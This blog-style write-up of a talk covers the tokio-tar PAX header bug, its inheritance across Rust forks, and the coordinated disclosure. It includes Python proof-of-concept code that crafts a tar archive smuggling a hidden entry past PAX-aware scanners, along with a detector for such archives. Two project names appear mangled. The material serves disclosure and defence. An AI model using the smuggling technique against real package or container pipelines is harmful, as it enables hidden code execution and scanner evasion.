
The Unseen Dangers in Open Source: A Deep Dive into a Critical Tar Bug 🐛💻

Hey tech enthusiasts! 👋 Ever wonder what lurks beneath the surface of the open-source software you use every day? Today, we’re diving deep into a fascinating, if slightly terrifying, bug that Marina Moore (Head of Research at Edera) and Alex Zenla (CTO of Edera) stumbled upon. This isn’t just about a single bug; it’s a journey into the intricate world of software supply chain security, the complexities of open-source ecosystems, and the often-overlooked responsibilities of project maintainers. 🚀

The Case of the Confusing Tar File 📂❓

It all started innocently enough. Alex and colleague Stephen were working with OCI images on their platform, trying to pull some benchmarks, when things suddenly went haywire. Their tool was extracting files that, quite frankly, didn’t exist in the tar file: perplexing, unexpected behavior.

“If you’re extracting files from a tar file that don’t exist, something really bad must have happened,” Alex realized.

Digging deeper, they discovered that the tar library they were using was also extracting nested tar files within the main one, all with a single extraction command. This was not how tar files were supposed to behave!

The Culprit: tokio-tar and a Dangerous Bug 💥

The library in question was tokio-tar, a popular asynchronous tar library for Rust built on the Tokio runtime. The bug was particularly nasty: when tokio-tar encountered a specially formatted tar file nested inside another tar file, it mistakenly parsed the inner archive’s entries as part of the outer one.

The bug received a CVSS severity score of 8.1, with the potential for remote code execution when combined with other tools. The panic intensified when Alex discovered that the vulnerable library was used by incredibly popular tools such as uv (from Astral), wasmCloud, and testcontainers. The impact reached far beyond their own team.

Understanding the Tar Threat: A Blast from the Past 💾🕰️

To grasp the vulnerability, we need a quick primer on tar files. These have been around since the late ’70s and early ’80s and form the backbone of OCI images. A tar file is a linear archive made of 512-byte blocks: each file gets a header block followed by its data, padded out to a block boundary. A key element is the header’s size field, which records the length of the file data and therefore tells a parser where the next header begins.
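
The layout is simple enough to walk by hand. The Python sketch below builds a minimal ustar header (only the name, mode, size, typeflag, magic, and checksum fields are filled in; real archives carry more) and lists entries by repeatedly reading a header and skipping its padded data. The helper names are illustrative, not taken from any library.

```python
BLOCK = 512  # tar is a sequence of fixed-size 512-byte blocks


def padded(n: int) -> int:
    """Round n up to a whole number of blocks."""
    return -(-n // BLOCK) * BLOCK


def ustar_header(name: str, size: int) -> bytes:
    """Build a minimal ustar header for a regular file (unused fields stay NUL)."""
    raw = name.encode("ascii")
    if len(raw) > 100:
        raise ValueError("ustar names are limited to 100 bytes in this sketch")
    if not 0 <= size <= 8**11 - 1:
        raise ValueError("size does not fit the 11-digit octal field; PAX is needed")
    hdr = bytearray(BLOCK)
    hdr[0:len(raw)] = raw                       # name (offset 0, 100 bytes)
    hdr[100:108] = b"0000644\0"                 # mode
    hdr[124:136] = f"{size:011o}\0".encode()    # size: 11 octal digits + NUL
    hdr[156:157] = b"0"                         # typeflag: regular file
    hdr[257:263] = b"ustar\0"                   # magic
    hdr[263:265] = b"00"                        # version
    hdr[148:156] = b" " * 8                     # checksum is summed with spaces here
    hdr[148:156] = f"{sum(hdr):06o}\0 ".encode()
    return bytes(hdr)


def list_entries(archive: bytes) -> list[tuple[str, int]]:
    """Walk header -> data -> header, using each size field to find the next header."""
    entries, pos = [], 0
    while pos + BLOCK <= len(archive):
        hdr = archive[pos:pos + BLOCK]
        if hdr == bytes(BLOCK):                 # an all-zero block ends the archive
            break
        name = hdr[0:100].split(b"\0")[0].decode("ascii")
        size = int(hdr[124:136].split(b"\0")[0] or b"0", 8)
        entries.append((name, size))
        pos += BLOCK + padded(size)             # skip the header, then the padded data
    return entries


data = b"hello\n"
archive = ustar_header("hello.txt", len(data)) + data.ljust(padded(len(data)), b"\0") + bytes(2 * BLOCK)
print(list_entries(archive))  # [('hello.txt', 6)]
```

Everything hinges on that one size field: if a parser reads the wrong value there, every subsequent "header" it finds is wherever that wrong value points.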

The vulnerability exploits a mechanism called PAX, the POSIX-standardized extension to the tar format. PAX allows for richer metadata, including file sizes too large for the ustar size field, which holds at most 11 octal digits (just under 8 GiB). The issue arises when this mechanism is not implemented correctly.
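
A PAX extended header is itself a tar entry whose data is a list of records of the form "<length> <keyword>=<value>" plus a newline, where the length counts the entire record, including its own digits. A minimal Python sketch of encoding and decoding those records, with illustrative helper names:

```python
# Largest size the ustar header can hold: 11 octal digits in a 12-byte field.
USTAR_MAX_SIZE = 8**11 - 1          # 8_589_934_591 bytes, just under 8 GiB


def pax_record(key: str, value: str) -> bytes:
    """Encode one PAX record: '<length> <key>=<value>\\n'.

    <length> includes its own digits, so iterate until the digit count settles."""
    body = f" {key}={value}\n".encode("utf-8")
    length = len(body) + 1
    while len(str(length)) + len(body) != length:
        length = len(str(length)) + len(body)
    return str(length).encode("ascii") + body


def parse_pax(data: bytes) -> dict[str, str]:
    """Decode PAX records; `data` must be exactly the extended header's payload."""
    records, pos = {}, 0
    while pos < len(data):
        space = data.index(b" ", pos)
        length = int(data[pos:space])
        record = data[pos:pos + length]
        if not record.endswith(b"\n"):
            raise ValueError(f"malformed PAX record at offset {pos}")
        key, _, value = record[space - pos + 1:-1].partition(b"=")
        records[key.decode("utf-8")] = value.decode("utf-8")
        pos += length
    return records


big = 12 * 2**30                     # a 12 GiB file
print(big > USTAR_MAX_SIZE)          # True: ustar alone cannot record this size
print(pax_record("size", str(big)))  # b'20 size=12884901888\n'
```

A reader that honors PAX must take the "size" record from this header and use it, not the ustar field, when deciding how far to skip past the file that follows.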

The Mechanics of the Exploit ⚙️

Here’s the crux of the problem:

  • PAX and USTAR: A PAX extended header is stored as its own entry just before the file it describes. When it supplies a size, that value overrides the size field in the file’s USTAR header, which may then be set to zero.
  • The Flaw: A parser that does not honor the PAX size falls back to the zero in the USTAR header and advances by zero bytes. It then reads the start of the file’s data as if it were the next tar header.
  • Masquerading Data: Crucially, the nested content didn’t need to be a real tar file; it only needed to look like one to the parser. This let data masquerade as archive entries, producing differential parsing bugs: different tools could see different sets of files within the same archive.
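
To make the desynchronization concrete, here is a small Python sketch that crafts such an archive. Python’s standard tarfile module plays the PAX-aware reader; entries_using_ustar_size is a hypothetical, simplified model of the flawed behavior (it reads past PAX headers but advances past each entry using only the ustar size field), not tokio-tar’s actual Rust code. The file names are made up for the example.

```python
import io
import tarfile

BLOCK = 512


def padded(n: int) -> int:
    """Round n up to a whole number of 512-byte blocks."""
    return -(-n // BLOCK) * BLOCK


def pad(data: bytes) -> bytes:
    """Append NULs so the data fills whole blocks."""
    return data + b"\0" * (padded(len(data)) - len(data))


def ustar_header(name: str, size: int, typeflag: bytes = b"0") -> bytes:
    """Minimal ustar header with a valid checksum; `size` fills the octal size field."""
    hdr = bytearray(BLOCK)
    raw = name.encode("ascii")
    hdr[0:len(raw)] = raw
    hdr[100:108] = b"0000644\0"                  # mode
    hdr[108:124] = b"0000000\0" * 2              # uid, gid
    hdr[124:136] = f"{size:011o}\0".encode()     # size
    hdr[136:148] = b"00000000000\0"              # mtime
    hdr[156:157] = typeflag
    hdr[257:265] = b"ustar\0" + b"00"            # magic + version
    hdr[148:156] = b" " * 8                      # checksum is summed with spaces here
    hdr[148:156] = f"{sum(hdr):06o}\0 ".encode()
    return bytes(hdr)


def pax_record(key: str, value: str) -> bytes:
    """'<length> <key>=<value>\\n', where length counts the whole record."""
    body = f" {key}={value}\n".encode()
    length = len(body) + 1
    while len(str(length)) + len(body) != length:
        length = len(str(length)) + len(body)
    return str(length).encode() + body


def entries_pax_aware(archive: bytes) -> list[str]:
    """Reference reader: tarfile applies a PAX 'size' before skipping data."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        return tf.getnames()


def entries_using_ustar_size(archive: bytes) -> list[str]:
    """Hypothetical flawed reader: skips PAX headers as metadata but always
    advances past an entry using its ustar size field."""
    names, pos = [], 0
    while pos + BLOCK <= len(archive):
        hdr = archive[pos:pos + BLOCK]
        if hdr == bytes(BLOCK):                  # all-zero block: end of archive
            break
        size = int(hdr[124:136].split(b"\0")[0] or b"0", 8)
        if hdr[156:157] != b"x":
            names.append(hdr[:100].split(b"\0")[0].decode())
        pos += BLOCK + padded(size)              # the PAX "size" is never consulted
    return names


# The data of outer.bin is itself a valid header plus file contents.
payload = b"#!/bin/sh\necho injected\n"
smuggled = ustar_header("injected.sh", len(payload)) + pad(payload)
pax = pax_record("size", str(len(smuggled)))

archive = (
    ustar_header("PaxHeader", len(pax), typeflag=b"x") + pad(pax)
    + ustar_header("outer.bin", 0)               # ustar size deliberately 0
    + smuggled                                   # PAX says these 1024 bytes are outer.bin's data
    + ustar_header("after.txt", 3) + pad(b"ok\n")
    + bytes(2 * BLOCK)                           # two zero blocks end the archive
)

print(entries_pax_aware(archive))          # ['outer.bin', 'after.txt']
print(entries_using_ustar_size(archive))   # ['outer.bin', 'injected.sh', 'after.txt']
```

The PAX-aware view treats the smuggled bytes as the opaque contents of outer.bin; the flawed view surfaces injected.sh as a real entry, one that a correct scanner would never list as a file.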

Attack Scenarios: From Python Builds to Container Images 😈

The implications of this bug are significant:

  • Python Build Hijacking: Imagine a malicious actor crafting the tar archive for a Python package, such as a source distribution. When a tool like uv extracts it, the bug could inject hidden files or overwrite critical manifest files, potentially leading to arbitrary code execution on developer machines. A malware scanner that parses the archive differently from the extractor might never even see these hidden files.
  • Container Image Poisoning: Similarly, a crafted container image could appear valid during scanning but contain injected tar files. Upon extraction, these could lead to different executables being run, turning a trusted image into a vector for malware.
  • Bypassing Manifests and Bills of Materials: The ability to manipulate how files are parsed can be used to fake manifests or bills of materials, creating a deceptive view of the container’s contents and enabling arbitrary code execution.
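
Each scenario above hinges on one condition: a PAX size that disagrees with the entry’s ustar size field. The following Python sketch (a hypothetical helper, not a feature of any real scanner) walks an archive the way a PAX-aware reader does and flags that condition. A mismatch is not proof of malice, since legitimate writers rely on the PAX size for files too large for the ustar field, but it is a cheap signal worth reviewing before trusting a manifest or bill of materials derived from the archive.

```python
BLOCK = 512


def padded(n: int) -> int:
    """Round n up to a whole number of 512-byte blocks."""
    return -(-n // BLOCK) * BLOCK


def octal(field: bytes) -> int:
    """Decode a NUL-terminated octal header field."""
    return int(field.split(b"\0")[0].strip() or b"0", 8)


def pax_records(data: bytes) -> dict[str, str]:
    """Parse '<length> <key>=<value>\\n' records from a PAX header's data."""
    records, pos = {}, 0
    while pos < len(data) and data[pos] != 0:
        space = data.index(b" ", pos)
        length = int(data[pos:space])
        key, _, value = data[space + 1:pos + length - 1].partition(b"=")
        records[key.decode()] = value.decode()
        pos += length
    return records


def size_mismatches(archive: bytes) -> list[tuple[int, int, int]]:
    """Return (header_offset, ustar_size, pax_size) for every entry whose
    PAX 'size' override disagrees with its ustar size field."""
    findings, pos, pax_size = [], 0, None
    while pos + BLOCK <= len(archive):
        hdr = archive[pos:pos + BLOCK]
        if hdr == bytes(BLOCK):                      # end-of-archive marker
            break
        ustar_size = octal(hdr[124:136])
        if hdr[156:157] == b"x":                     # per-file PAX extended header
            size = pax_records(archive[pos + BLOCK:pos + BLOCK + ustar_size]).get("size")
            pax_size = int(size) if size is not None else None
            pos += BLOCK + padded(ustar_size)
            continue
        size = ustar_size
        if pax_size is not None:
            if pax_size != ustar_size:
                findings.append((pos, ustar_size, pax_size))
            size = pax_size                          # advance as a PAX-aware reader would
            pax_size = None
        pos += BLOCK + padded(size)
    return findings


def toy_header(name: bytes, size: int, typeflag: bytes = b"0") -> bytes:
    """Demo-only header: no checksum or magic, so real tar tools would reject it."""
    hdr = bytearray(BLOCK)
    hdr[:len(name)] = name
    hdr[124:136] = f"{size:011o}\0".encode()
    hdr[156:157] = typeflag
    return bytes(hdr)


record = b"13 size=1024\n"
crafted = (
    toy_header(b"pax", len(record), b"x") + record.ljust(BLOCK, b"\0")
    + toy_header(b"outer.bin", 0) + bytes(1024)      # ustar says 0 bytes, PAX says 1024
    + bytes(2 * BLOCK)
)
print(size_mismatches(crafted))   # [(1024, 0, 1024)]
```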

The Forking Nightmare: A Cascading Problem 🌳🔄🌳

What made this bug particularly challenging to fix was its presence across multiple forks of the original tar library. The lineage looked something like this:

  1. tar (the original Rust crate)
  2. async-tar (an asynchronous tar library forked from tar)
  3. tokio-tar (forked from async-tar to work with the Tokio runtime)
  4. krata-tokio-tar (forked from tokio-tar by Edera because tokio-tar was unmaintained)
  5. astral-tokio-tar (forked from krata-tokio-tar by Astral)

Every single one of these forks inherited the same bug! The result was a complex web of dependencies in which numerous projects, including the widely used uv, bentock, and opoam, were vulnerable. A scan turned up more than 120 crates on crates.io depending on one of the vulnerable versions.

The Disclosure Dilemma: No Single Upstream 🤝❌

The disclosure process was a Herculean effort. There was no single upstream to patch. Alex and Marina had to:

  • Contact Multiple Maintainers: This involved extensive sleuthing, from digging through commit emails and relying on “friend of a friend” connections to investigating deprecated projects.
  • Develop Multiple Patches: Patches had to be developed for each individual fork, and some diverged significantly.
  • Coordinate a 60-Day Embargo: This was a tight deadline to get fixes out.
  • Take on Extra Responsibility: Because many maintainers were unresponsive or unavailable, Edera effectively stepped in to manage disclosure and patching for the broader community.
  • Notify Downstream Users: They proactively informed affected downstream projects such as Astral’s uv, even before the embargo lifted, because of the bug’s significant impact.

Huge props go to the Astral team behind uv for their responsiveness, their existing security policy, and their active participation in the disclosure.

The Open Source Ecosystem: Questions and Reflections 🤔💡

This experience illuminated several critical questions about the open-source landscape:

Who Do You Disclose To? 📢

When a project isn’t actively maintained or doesn’t know its users, who is responsible for notifying them? The lines blur between notifying the project maintainer and directly informing the downstream users who are ultimately affected.

What Does It Mean to Be an Open Source Project? 🌍

Open source exists on a spectrum. From robust, foundation-backed projects to personal hobby projects, the expectations regarding maintenance, responsiveness, and security differ vastly. Clarifying this spectrum upfront is crucial.

Why Do Projects Get Forked? 🌳

Forks arise from unmaintained upstreams, specific use-case needs, or disagreements in project direction. While a benefit of open code, it can lead to user confusion about which version to trust and maintain.

The Unmaintained Reality 📉

By the figures cited in the talk, a staggering half of open-source projects go unmaintained within four years. Factors like a strong community and organizational support significantly affect a project’s longevity.

Responsibility for Bugs: A Two-Way Street 🚦

Users expect security fixes, but maintainers’ commitments vary widely. A license governs how the code may be used, not whether anyone will support it. A clear declaration of a project’s support level (e.g., “will fix bugs,” “accepting patches,” “hobby project”) is vital.

Reporter’s Responsibility: How Far Do You Go? 🔎

When a bug is found, how much effort should the reporter invest? Should they be expected to write patches, investigate severity, or track down downstream users? Supporting those who want to do the right thing is key.

Making Open Source More Sustainable and Secure 🌱🛠️

To address these challenges, Edera proposes three actionable steps:

  1. Declare Your Project’s Support Plan: Be transparent in your README about bug fixing, vulnerability reporting, and contact methods.
  2. Maintain a SECURITY.md File: A standard place for security-related information, making it easy for reporters to find the right channel and submit issues. Crucially, monitor the channels you list!
  3. Make Open Source Sustainable: Encourage funding, contributions, and community support to ensure projects remain maintained and secure. When thousands of users rely on a project, they should contribute to its upkeep.
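
GitHub, for one, recognizes a SECURITY.md placed in the repository root, docs/, or .github/. A small Python sketch for checking whether a repository has one, given its list of tracked files (for example, the output of git ls-files); the function name is hypothetical, and matching the file name case-insensitively is a deliberately lenient choice:

```python
from pathlib import PurePosixPath

# Directories GitHub checks for a security policy: repository root, docs/, .github/.
POLICY_DIRS = {".", "docs", ".github"}


def security_policies(repo_files: list[str]) -> list[str]:
    """Return repository-relative paths that look like a SECURITY.md policy."""
    return sorted(
        path
        for path in repo_files
        if PurePosixPath(path).name.lower() == "security.md"
        and str(PurePosixPath(path).parent) in POLICY_DIRS
    )
```

An empty result is a hint that reporters may have no obvious place to send a vulnerability report.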

The Aftermath: Patches, Archiving, and a Call to Action 📢✨

Ultimately, the tokio-tar bug was patched in some forks, notably by Astral in astral-tokio-tar. However, tokio-tar itself remains unmaintained, and outreach to it has gone unanswered. Edera developed and shared its own patch for it while recommending that users migrate to an actively maintained fork.

To prevent future confusion, Edera archived its own fork (krata-tokio-tar) and encouraged users to coalesce around the patched astral-tokio-tar.

Even with these efforts, a few projects still use older, vulnerable versions of tokio-tar. If you know anyone using it, please let them know! 🙏

This entire experience highlights the critical need for better communication, clearer expectations, and more sustainable practices within the open-source community. By working together, we can build a more secure and reliable digital future for everyone.

Thank you for joining us on this deep dive! Stay curious, stay safe, and keep contributing to a better open-source world! 🌍❤️
